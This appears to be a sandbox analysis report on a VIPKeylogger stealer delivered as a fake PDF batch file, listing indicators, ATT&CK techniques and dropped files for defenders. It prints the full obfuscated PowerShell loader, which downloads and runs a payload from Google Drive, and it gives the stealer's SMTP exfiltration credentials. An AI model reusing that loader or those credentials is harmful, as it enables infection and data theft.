vipkeylogger | c58272a1c514f2c5705263251866bfe250cfce3d2b6091373265ff28e4a90205

Analysis

max time kernel
293s
max time network
209s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
05/11/2024, 01:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Payment_Advice.pdf.bat
Size

7KB
MD5

21f91634f445a50f35c006b0c020d0e5
SHA1

64515fa088794b3a62d9863a923b0826e55fecdc
SHA256

b86eb964387f5ed092dad608dd90e9db78fc16d813e6c0720ef409ff458df8d6
SHA512

cd85d95ffac19c47fd06ccc3ac21e6fa4448237572db89d95d0d4f880ef52661998743bb6a152727cf28e472becebc314e62f3f92aad4b5bd5aa885ca6662555
SSDEEP

192:83QlNCq7EH9QUjeYtgpcWOUSNAx21W9v7iBLzP3:4oNCqQ9XqYt2SNe214OJzP

Score

10^/10

vipkeylogger collection discovery execution keylogger stealer

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mail.jacopopacchioni.com
Port:
587
Username:
[email protected]
Password:
Ct2mZ=B-7tCC2019

Extracted

Family

vipkeylogger

Credentials

Protocol: smtp
Host:
mail.jacopopacchioni.com
Port:
587
Username:
[email protected]
Password:
Ct2mZ=B-7tCC2019
Email To:
[email protected]

Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger
Vipkeylogger family
vipkeylogger

Blocklisted process makes network request 12 IoCs

flow	pid	Process
8	2016	powershell.exe
14	2016	powershell.exe
31	1408	msiexec.exe
33	1408	msiexec.exe
35	1408	msiexec.exe
38	1408	msiexec.exe
39	1408	msiexec.exe
44	1408	msiexec.exe
50	1408	msiexec.exe
54	1408	msiexec.exe
63	1408	msiexec.exe
65	1408	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2016	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe
Key opened	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe
Key opened	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
7	drive.google.com
8	drive.google.com
31	drive.google.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
42	checkip.dyndns.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1408	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2440	powershell.exe
1408	msiexec.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

System Time Discovery 1 TTPs 1 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
2440	powershell.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
2016	powershell.exe
2016	powershell.exe
2440	powershell.exe
2440	powershell.exe
2440	powershell.exe
1408	msiexec.exe
1408	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2440	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeDebugPrivilege	1408	msiexec.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1472 wrote to memory of 2016	1472	cmd.exe	85
PID 1472 wrote to memory of 2016	1472	cmd.exe	85
PID 2440 wrote to memory of 1408	2440	powershell.exe	105
PID 2440 wrote to memory of 1408	2440	powershell.exe	105
PID 2440 wrote to memory of 1408	2440	powershell.exe	105
PID 2440 wrote to memory of 1408	2440	powershell.exe	105

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Payment_Advice.pdf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1472
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -windowstyle hidden " <#Nailsickness Fllens Inhaling Mummied Sacrospinous bonafide Arthropathy #>;$Abater='Sensibleness82';<#Loger Gestusernes Quittances #>; function Hensigtmssigheds142($Hanefjedsmnster){If ($host.DebuggerEnabled) {$Gemmily++;}$Hypercholesterolemic135=$Magnetoplasmadynamics+$Hanefjedsmnster.'Length' - $Gemmily; for ( $Pantebrevshandelen=5;$Pantebrevshandelen -lt $Hypercholesterolemic135;$Pantebrevshandelen+=6){$Pollocks=$Pantebrevshandelen;$Vandpibernes+=$Hanefjedsmnster[$Pantebrevshandelen];}$Vandpibernes;}function Winonas($Rigelian){ & ($Spillene) ($Rigelian);}$Blgebryderes=Hensigtmssigheds142 'P oblM Dis,oGravkzHayshiMechalUdviklMissaaVivif/ Felo ';$Sprogvidenskaberne=Hensigtmssigheds142 'LeuciTPaleol .tbesEarsp1 S en2Vesuv ';$Tepee=' heli[ celenKumuleEmusztFljls.D nneS vtrEMistnRZircoVTum eiKnoc,cOverweMac ep trkokinneIformeNFundattalipmFrienAJun.tnunfloATi.glGRelecESvangr Hkl ]Svlgs:Umbri: ourSWariseB,ddecpartiuTapesrd areiSubroTAgteryAntiaP StrmR Tommo StrotPyrenoAllicCDisafORisinl Plug= vrgp$TroldSPr.cePmejetrFluoroStaleg.aadpvEchoiiShelld De iEBishoNOpp,ssDdsenkForsta runbOpgavEExaugrFiskenInelee.hila ';$Blgebryderes+=Hensigtmssigheds142 'syste5Jemed.Inabo0Parad Hydri(Pe,ipWMo,ieiAfstanDatoldTo oro St pwScopisSalon KancN TraeTno au S mit1Ins e0M,ris.Slags0 Semi; P,ed Hyp,rW OuthiAnmienVelko6capre4 Pase;Flora tyv,sxB tan6Desmo4Chemu;Refur SolinrSt.fpvDru.a:Ste.e1Solbr3 arsu1 Hibe. ugti0Refl )Epi r OmtaaGKgfnue CambcFormlktillyo I it/ Alaz2Brneg0Anhol1C mba0Kirke0konte1miske0Haze 1Apiac gemy FBrstii MunirEmalje Amorf Fa eo CajuxMulti/ El,c1Theod3Trus 1Toupe.Salpi0 Dad ';$Ristningers=Hensigtmssigheds142 'PunglUant lSGorgoEU.camRSha l- RobuaTolvtG .rkaeI chmnByedaTBogfr ';$divagations=Hensigtmssigheds142 'Kedelh Rebetunsp tmedlip Sc.tsEleos:Estiv/et no/Sap.udaltetrMais iS idsvEc noeKunst. Ud egGrievoGymnao tocgBatiklSalaaeSpr g.pistecDiss ocon.emPejl / pistugenkec Tilk?Pa roeGooksxForg pRufouoSgetirOverltSamme=Grog,dNonapoKvartwEsprinNonexl JrgeoScul aProdudJacka& ippeiUf,ttdForud=Prein1 BestuBett t nthrAAlung-Una lxMarke9ArcheSN tioQ aalJMirthuFl.geEMind.9.oong0SoberbSprge4TandbXHif lnDialy8 SvorwParnenPromisBenefQSuffeR kia4Ge,iak nectL.ommep ParaVAllanQDrtrss dbetsForstoFolio ';$hormonises=Hensigtmssigheds142 ' Unde>Mac,i ';$Spillene=Hensigtmssigheds142 'In,raIVetoeESaddlXMolly ';$Velsituerede='Unpetrified';$Staphylea='\bhutia.Air';Winonas (Hensigtmssigheds142 'Lys y$ lansGResulL TartoStef bpanfuaPreneLTreda: be oPRevolhAtrenlformaEInfidb,gtigoLintsT Monoo Ch,rmcolorYKo.pe=Bloka$ iskeeBi teNKomplVArmer:KommaaMyresP Epo.pDumpeDaldera M geTKaktuA Sejs+Offic$ Eu ys CodeTTremmAPortuPSuperHAltery Rif L,onceE owteaOccip ');Winonas (Hensigtmssigheds142 'Neds,$halskGE.sfoL Di ko R sobSolkra Br nLBoxie:O erlFBl ktO AraerStiltGHy rarRatefUBeastNW,oleDBlo ksUn,ffFSwaddAOctilrSplanVParroEThyrsrAlbum=Flers$Fea hd Hu aIFe,ltVTi,faa verng I.trA TractGeb.kiEmpowOludben ainfs Trkn.Ja,ziSShu.tpSicklLIagtti St lT Neon(Besv $HalfphAdstroVakuurV estm andioCreesnEmbraiFrostsSq adeagnewS Dal,) tora ');Winonas (Hensigtmssigheds142 $Tepee);$divagations=$Forgrundsfarver[0];$Noseover=(Hensigtmssigheds142 'Nongo$T lvigLrlinL N alO fuldb onfiAda.vrLC eer:,cillmAvestAalvisrSpiseo ImpekAntndkNit iahypernRetteE debiRSpildEMohelSOffer=ChowanYan ue .unkw,rafi-.egynoUnth BTa tajSprinE OxheC,irbuT ydro .idesssla vy jumbsMidtstAu onesnic,mGrasp.TofuknArsoneSandhTUvanl.UdkldWSkimleGv.raBidio.c Saftl ,ariIT rmiE herenrad cTFibre ');Winonas ($Noseover);Winonas (Hensigtmssigheds142 'Mande$ S,avM SpecaBerkor bil oChampklrevik mattafiltenTvrdreRoa sr Mat,e waapsVarme. opskHP reeeTaleba ForsdM.chae La nr ,agosblaat[Usa d$EkstrRLinjeiSm llsFrkrit Dis nS aldi FlignUdpl gIm,roeHopefrPristsFrapl]Logic=S lin$HailwB Fol.lSpottgparaseMetapb ordorLivsfyP llad ,odeeDikdirDishaeIncoisMenin ');$Modtagelsesdatoens=Hensigtmssigheds142 'Circ $ Fe rMAdjunaHeeltr levioAssockRos,dkL,ngsaInfranDollae.rainrUndeceBallisR arb.agersDTubaeoFlankwClearn studlTippeouni oaAnortd,ilflFFunkti riklObstreleuci( Sub $StilfdBesluiPibervPapyrale engSmel aAuditt udgii SubsoLean,n ractsVredt,Miche$Panc R a ago SindwknejsaOmbranPon,ebOptagelytt r MorerEpigryGro,n)Uniso ';$Rowanberry=$Phlebotomy;Winonas (Hensigtmssigheds142 '.eopa$HaandG,espelElastOFil pbHent avatt,lAired:WyledUOuthedTei,tlMuseuIT utoGprogrGImpere UfejRUov rBS praA rypAstuk.DStrideEfterN O tsSResor=col m(KropltTegl eRevensDeorwt V ge-Sing pUdvikaFrilathanaphS.bur F,oks$OrtogRB otloR comwAcet aAlexiNKnipsbHydroESlikprDecasrUdst,Y Fost) bran ');while (!$udliggerbaadens) {Winonas (Hensigtmssigheds142 'milli$bimilg SphelKas eoSkralbBaccha O thl Atte:GladsN N dseKobbelRensneF ndss,mutc=Inter$AgaintHaardrBeskru BreveB nqu ') ;Winonas $Modtagelsesdatoens;Winonas (Hensigtmssigheds142 'corolSStundTProf.amresfrUsli TMass -BetydsAlbueLforskeIns aE ybatpCheck entr.4Blokh ');Winonas (Hensigtmssigheds142 'C ris$cr,diG BusklAnnonoSt mpbSnupta,ukkel rund: StraUSort,dS perl VelsiInde,gHungrGFingeetomm,R doz b SwinA StraaS eepD KrakEbifalNKonnes Ridt=Udsp (Seje TForbrEKla.hSKogtet ytho-KltriPLenosaSystetTeks H Mate Att.i$SprecRDolkeo,rovewSucceASamojNNa coB FejleEaverr GennRNu haYBankn)Creat ') ;Winonas (Hensigtmssigheds142 'Inc r$ Kas GUltral P.dfoCheepB OktaaRa eoL,mrer:La geRStln.i Te.cDBer meN ncoHAnnike bar s T,llT CotieForu =Subpr$ UndeG Jag,L MarcO,osheBG.emaaAffluLHydr :enjoikFlambrTilsteSammesBacksT FremeKogen4Sanit7 unn+med,e+Korp %Rifbj$Footmfconfio DuperDedikGProgrR BemaU kgsbNFremkDS inns Ud pf UpfraWreatRglucoVTra ieB acarOpdri. Om.tc UndeOFriedUNettoNTopi,T Skrk ') ;$divagations=$Forgrundsfarver[$Rideheste];}$Colley=336825;$Alrunerodens=30714;Winonas (Hensigtmssigheds142 'Blind$Lde iGsprinlByggeO Va dB VindA.orenlPriva:FavrsK SimuyJern a,mpiruHuskenTelesGRadi. Teoso=semi Naes,Gforbre StilTYello-Mo ilcDjvleoDatasNFygerTShye ESkoddnCoregT inst Astar$ NursRNarraOVirksWGeoloASure,nCircuB Dispe OffeR F kurS.ermy Tant ');Winonas (Hensigtmssigheds142 'Creat$ EtamgMa tel AfteoVestab ArseaKatetl .rst:PamflT UranjMenneePorn nVideoeHydros Hea tSimuleIchthm OlseaOverdnEnrobd,verds I dsl IncooGateavCounteKampkn atoe RabbsTampo Indda=Gunn Sudse[ UdskSAfkbeyFejlpsAbysstforsteOutw mOphol. DiakCNi onoChenfn Struv Havee Te trMiniat nac]En eg: Stri: uricFForlir B.rio nebbmOoze,Bhexosa Ta lsKvgeneKlogs6Aarhu4Ser mS ClartBenf,rSolv iTellunMund.gVejba(Unexa$,argeKF,mteyanatoaGeopouSystenSlipegkandi)Qui q ');Winonas (Hensigtmssigheds142 'Salut$GantlGGlassLBodleo A,arbgul.mABloduLKrepi:DiateTSkydeEBlretrEm.eaRFlo piTwyerN Bu,a Ggler=Thigm preli[OplggsPernyY Tetrs,endiTUhjlpE elanmIndes.stibetFormueDisprXUdgraTStime.SauraESalpenAngorcPoemeoNytaaDgaffeiPinboNNonadgCirku]Kn ld:Spa k:FiligASamfusS,vbrcHvidkIPromiIHelio. O deg U veeAntedtNectas BractBloodrConvuI M ltnOperag Ot s( Leg $BrudeTBrnefjf,rcaE Tre nSmrinEK treSPseudtOmvenESu erMK,mibaMytedNEmbr d coosEwh wlRegiooHap.ov,etniE Angen,olkeeLa resSur e)Mollu ');Winonas (Hensigtmssigheds142 'F lka$SubjuGDiploLAlkoho StenbIgnoraOvergLBowep:AggloPEkkoeaTrre T Ret eB unsNKolo,t BraclSmrekY Sub,=Slaas$ Va,gTLejeve RapiR AssurPianiI odpaNA.pha. U,nosudpibUKolleBPoc es acocTAvisfRUn doibagpiNrourkg Lers(Hydra$SoldyCFlowco Tun LUnderL Smrbe B,vayHjere, Perc$ValutAHalvkl Propr ArmaUVikinnUnorieR egerSto,hOBrystdSkrivE trgen A busHumph)Leono ');Winonas $Patently;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Nailsickness Fllens Inhaling Mummied Sacrospinous bonafide Arthropathy #>;$Abater='Sensibleness82';<#Loger Gestusernes Quittances #>; function Hensigtmssigheds142($Hanefjedsmnster){If ($host.DebuggerEnabled) {$Gemmily++;}$Hypercholesterolemic135=$Magnetoplasmadynamics+$Hanefjedsmnster.'Length' - $Gemmily; for ( $Pantebrevshandelen=5;$Pantebrevshandelen -lt $Hypercholesterolemic135;$Pantebrevshandelen+=6){$Pollocks=$Pantebrevshandelen;$Vandpibernes+=$Hanefjedsmnster[$Pantebrevshandelen];}$Vandpibernes;}function Winonas($Rigelian){ & ($Spillene) ($Rigelian);}$Blgebryderes=Hensigtmssigheds142 'P oblM Dis,oGravkzHayshiMechalUdviklMissaaVivif/ Felo ';$Sprogvidenskaberne=Hensigtmssigheds142 'LeuciTPaleol .tbesEarsp1 S en2Vesuv ';$Tepee=' heli[ celenKumuleEmusztFljls.D nneS vtrEMistnRZircoVTum eiKnoc,cOverweMac ep trkokinneIformeNFundattalipmFrienAJun.tnunfloATi.glGRelecESvangr Hkl ]Svlgs:Umbri: ourSWariseB,ddecpartiuTapesrd areiSubroTAgteryAntiaP StrmR Tommo StrotPyrenoAllicCDisafORisinl Plug= vrgp$TroldSPr.cePmejetrFluoroStaleg.aadpvEchoiiShelld De iEBishoNOpp,ssDdsenkForsta runbOpgavEExaugrFiskenInelee.hila ';$Blgebryderes+=Hensigtmssigheds142 'syste5Jemed.Inabo0Parad Hydri(Pe,ipWMo,ieiAfstanDatoldTo oro St pwScopisSalon KancN TraeTno au S mit1Ins e0M,ris.Slags0 Semi; P,ed Hyp,rW OuthiAnmienVelko6capre4 Pase;Flora tyv,sxB tan6Desmo4Chemu;Refur SolinrSt.fpvDru.a:Ste.e1Solbr3 arsu1 Hibe. ugti0Refl )Epi r OmtaaGKgfnue CambcFormlktillyo I it/ Alaz2Brneg0Anhol1C mba0Kirke0konte1miske0Haze 1Apiac gemy FBrstii MunirEmalje Amorf Fa eo CajuxMulti/ El,c1Theod3Trus 1Toupe.Salpi0 Dad ';$Ristningers=Hensigtmssigheds142 'PunglUant lSGorgoEU.camRSha l- RobuaTolvtG .rkaeI chmnByedaTBogfr ';$divagations=Hensigtmssigheds142 'Kedelh Rebetunsp tmedlip Sc.tsEleos:Estiv/et no/Sap.udaltetrMais iS idsvEc noeKunst. Ud egGrievoGymnao tocgBatiklSalaaeSpr g.pistecDiss ocon.emPejl / pistugenkec Tilk?Pa roeGooksxForg pRufouoSgetirOverltSamme=Grog,dNonapoKvartwEsprinNonexl JrgeoScul aProdudJacka& ippeiUf,ttdForud=Prein1 BestuBett t nthrAAlung-Una lxMarke9ArcheSN tioQ aalJMirthuFl.geEMind.9.oong0SoberbSprge4TandbXHif lnDialy8 SvorwParnenPromisBenefQSuffeR kia4Ge,iak nectL.ommep ParaVAllanQDrtrss dbetsForstoFolio ';$hormonises=Hensigtmssigheds142 ' Unde>Mac,i ';$Spillene=Hensigtmssigheds142 'In,raIVetoeESaddlXMolly ';$Velsituerede='Unpetrified';$Staphylea='\bhutia.Air';Winonas (Hensigtmssigheds142 'Lys y$ lansGResulL TartoStef bpanfuaPreneLTreda: be oPRevolhAtrenlformaEInfidb,gtigoLintsT Monoo Ch,rmcolorYKo.pe=Bloka$ iskeeBi teNKomplVArmer:KommaaMyresP Epo.pDumpeDaldera M geTKaktuA Sejs+Offic$ Eu ys CodeTTremmAPortuPSuperHAltery Rif L,onceE owteaOccip ');Winonas (Hensigtmssigheds142 'Neds,$halskGE.sfoL Di ko R sobSolkra Br nLBoxie:O erlFBl ktO AraerStiltGHy rarRatefUBeastNW,oleDBlo ksUn,ffFSwaddAOctilrSplanVParroEThyrsrAlbum=Flers$Fea hd Hu aIFe,ltVTi,faa verng I.trA TractGeb.kiEmpowOludben ainfs Trkn.Ja,ziSShu.tpSicklLIagtti St lT Neon(Besv $HalfphAdstroVakuurV estm andioCreesnEmbraiFrostsSq adeagnewS Dal,) tora ');Winonas (Hensigtmssigheds142 $Tepee);$divagations=$Forgrundsfarver[0];$Noseover=(Hensigtmssigheds142 'Nongo$T lvigLrlinL N alO fuldb onfiAda.vrLC eer:,cillmAvestAalvisrSpiseo ImpekAntndkNit iahypernRetteE debiRSpildEMohelSOffer=ChowanYan ue .unkw,rafi-.egynoUnth BTa tajSprinE OxheC,irbuT ydro .idesssla vy jumbsMidtstAu onesnic,mGrasp.TofuknArsoneSandhTUvanl.UdkldWSkimleGv.raBidio.c Saftl ,ariIT rmiE herenrad cTFibre ');Winonas ($Noseover);Winonas (Hensigtmssigheds142 'Mande$ S,avM SpecaBerkor bil oChampklrevik mattafiltenTvrdreRoa sr Mat,e waapsVarme. opskHP reeeTaleba ForsdM.chae La nr ,agosblaat[Usa d$EkstrRLinjeiSm llsFrkrit Dis nS aldi FlignUdpl gIm,roeHopefrPristsFrapl]Logic=S lin$HailwB Fol.lSpottgparaseMetapb ordorLivsfyP llad ,odeeDikdirDishaeIncoisMenin ');$Modtagelsesdatoens=Hensigtmssigheds142 'Circ $ Fe rMAdjunaHeeltr levioAssockRos,dkL,ngsaInfranDollae.rainrUndeceBallisR arb.agersDTubaeoFlankwClearn studlTippeouni oaAnortd,ilflFFunkti riklObstreleuci( Sub $StilfdBesluiPibervPapyrale engSmel aAuditt udgii SubsoLean,n ractsVredt,Miche$Panc R a ago SindwknejsaOmbranPon,ebOptagelytt r MorerEpigryGro,n)Uniso ';$Rowanberry=$Phlebotomy;Winonas (Hensigtmssigheds142 '.eopa$HaandG,espelElastOFil pbHent avatt,lAired:WyledUOuthedTei,tlMuseuIT utoGprogrGImpere UfejRUov rBS praA rypAstuk.DStrideEfterN O tsSResor=col m(KropltTegl eRevensDeorwt V ge-Sing pUdvikaFrilathanaphS.bur F,oks$OrtogRB otloR comwAcet aAlexiNKnipsbHydroESlikprDecasrUdst,Y Fost) bran ');while (!$udliggerbaadens) {Winonas (Hensigtmssigheds142 'milli$bimilg SphelKas eoSkralbBaccha O thl Atte:GladsN N dseKobbelRensneF ndss,mutc=Inter$AgaintHaardrBeskru BreveB nqu ') ;Winonas $Modtagelsesdatoens;Winonas (Hensigtmssigheds142 'corolSStundTProf.amresfrUsli TMass -BetydsAlbueLforskeIns aE ybatpCheck entr.4Blokh ');Winonas (Hensigtmssigheds142 'C ris$cr,diG BusklAnnonoSt mpbSnupta,ukkel rund: StraUSort,dS perl VelsiInde,gHungrGFingeetomm,R doz b SwinA StraaS eepD KrakEbifalNKonnes Ridt=Udsp (Seje TForbrEKla.hSKogtet ytho-KltriPLenosaSystetTeks H Mate Att.i$SprecRDolkeo,rovewSucceASamojNNa coB FejleEaverr GennRNu haYBankn)Creat ') ;Winonas (Hensigtmssigheds142 'Inc r$ Kas GUltral P.dfoCheepB OktaaRa eoL,mrer:La geRStln.i Te.cDBer meN ncoHAnnike bar s T,llT CotieForu =Subpr$ UndeG Jag,L MarcO,osheBG.emaaAffluLHydr :enjoikFlambrTilsteSammesBacksT FremeKogen4Sanit7 unn+med,e+Korp %Rifbj$Footmfconfio DuperDedikGProgrR BemaU kgsbNFremkDS inns Ud pf UpfraWreatRglucoVTra ieB acarOpdri. Om.tc UndeOFriedUNettoNTopi,T Skrk ') ;$divagations=$Forgrundsfarver[$Rideheste];}$Colley=336825;$Alrunerodens=30714;Winonas (Hensigtmssigheds142 'Blind$Lde iGsprinlByggeO Va dB VindA.orenlPriva:FavrsK SimuyJern a,mpiruHuskenTelesGRadi. Teoso=semi Naes,Gforbre StilTYello-Mo ilcDjvleoDatasNFygerTShye ESkoddnCoregT inst Astar$ NursRNarraOVirksWGeoloASure,nCircuB Dispe OffeR F kurS.ermy Tant ');Winonas (Hensigtmssigheds142 'Creat$ EtamgMa tel AfteoVestab ArseaKatetl .rst:PamflT UranjMenneePorn nVideoeHydros Hea tSimuleIchthm OlseaOverdnEnrobd,verds I dsl IncooGateavCounteKampkn atoe RabbsTampo Indda=Gunn Sudse[ UdskSAfkbeyFejlpsAbysstforsteOutw mOphol. DiakCNi onoChenfn Struv Havee Te trMiniat nac]En eg: Stri: uricFForlir B.rio nebbmOoze,Bhexosa Ta lsKvgeneKlogs6Aarhu4Ser mS ClartBenf,rSolv iTellunMund.gVejba(Unexa$,argeKF,mteyanatoaGeopouSystenSlipegkandi)Qui q ');Winonas (Hensigtmssigheds142 'Salut$GantlGGlassLBodleo A,arbgul.mABloduLKrepi:DiateTSkydeEBlretrEm.eaRFlo piTwyerN Bu,a Ggler=Thigm preli[OplggsPernyY Tetrs,endiTUhjlpE elanmIndes.stibetFormueDisprXUdgraTStime.SauraESalpenAngorcPoemeoNytaaDgaffeiPinboNNonadgCirku]Kn ld:Spa k:FiligASamfusS,vbrcHvidkIPromiIHelio. O deg U veeAntedtNectas BractBloodrConvuI M ltnOperag Ot s( Leg $BrudeTBrnefjf,rcaE Tre nSmrinEK treSPseudtOmvenESu erMK,mibaMytedNEmbr d coosEwh wlRegiooHap.ov,etniE Angen,olkeeLa resSur e)Mollu ');Winonas (Hensigtmssigheds142 'F lka$SubjuGDiploLAlkoho StenbIgnoraOvergLBowep:AggloPEkkoeaTrre T Ret eB unsNKolo,t BraclSmrekY Sub,=Slaas$ Va,gTLejeve RapiR AssurPianiI odpaNA.pha. U,nosudpibUKolleBPoc es acocTAvisfRUn doibagpiNrourkg Lers(Hydra$SoldyCFlowco Tun LUnderL Smrbe B,vayHjere, Perc$ValutAHalvkl Propr ArmaUVikinnUnorieR egerSto,hOBrystdSkrivE trgen A busHumph)Leono ');Winonas $Patently;"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- System Time Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2440
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Accesses Microsoft Outlook profiles
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
  PID:1408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

System Location Discovery

T1614

System Language Discovery

T1614.001

System Time Discovery

T1124

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d4ff23c124ae23955d34ae2a7306099a

SHA1
b814e3331a09a27acfcd114d0c8fcb07957940a3

SHA256
1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

SHA512
f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qwfqqnll.w5z.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\bhutia.Air

Filesize
478KB

MD5
5fe81b883b2f9511560677474788c719

SHA1
cf041cbaf7e13a0a6dbb1632352e6ed5e7a4b6c3

SHA256
a80e4c8d35a4d48bca973141287d27fabc3ce7b282a01b6be189f7e93e33d42b

SHA512
af9be2d7c135a99b14886c082c9809c4783324c24def293ecac4965a21b05239488f84b3b3e3f718d0ead510abad78f6d1d096e38702bde0df11d10016d3368e

Download Submit
memory/1408-77-0x0000000022CB0000-0x00000000231DC000-memory.dmp

Filesize
5.2MB

Download
memory/1408-71-0x0000000000DB0000-0x0000000002004000-memory.dmp

Filesize
18.3MB

Download
memory/1408-72-0x0000000000DB0000-0x0000000000DFA000-memory.dmp

Filesize
296KB

Download
memory/1408-73-0x0000000021AF0000-0x0000000021B8C000-memory.dmp

Filesize
624KB

Download
memory/1408-75-0x00000000225B0000-0x0000000022772000-memory.dmp

Filesize
1.8MB

Download
memory/1408-76-0x0000000021E70000-0x0000000021EC0000-memory.dmp

Filesize
320KB

Download
memory/1408-81-0x000000001F630000-0x000000001F63A000-memory.dmp

Filesize
40KB

Download
memory/1408-80-0x0000000022780000-0x0000000022812000-memory.dmp

Filesize
584KB

Download
memory/2016-14-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp

Filesize
10.8MB

Download
memory/2016-22-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp

Filesize
10.8MB

Download
memory/2016-19-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp

Filesize
10.8MB

Download
memory/2016-17-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp

Filesize
10.8MB

Download
memory/2016-16-0x00007FFDC0733000-0x00007FFDC0735000-memory.dmp

Filesize
8KB

Download
memory/2016-2-0x00007FFDC0733000-0x00007FFDC0735000-memory.dmp

Filesize
8KB

Download
memory/2016-13-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp

Filesize
10.8MB

Download
memory/2016-3-0x000001AB50050000-0x000001AB50072000-memory.dmp

Filesize
136KB

Download
memory/2440-45-0x0000000006740000-0x000000000675A000-memory.dmp

Filesize
104KB

Download
memory/2440-56-0x0000000074780000-0x0000000074F30000-memory.dmp

Filesize
7.7MB

Download
memory/2440-44-0x0000000007A00000-0x000000000807A000-memory.dmp

Filesize
6.5MB

Download
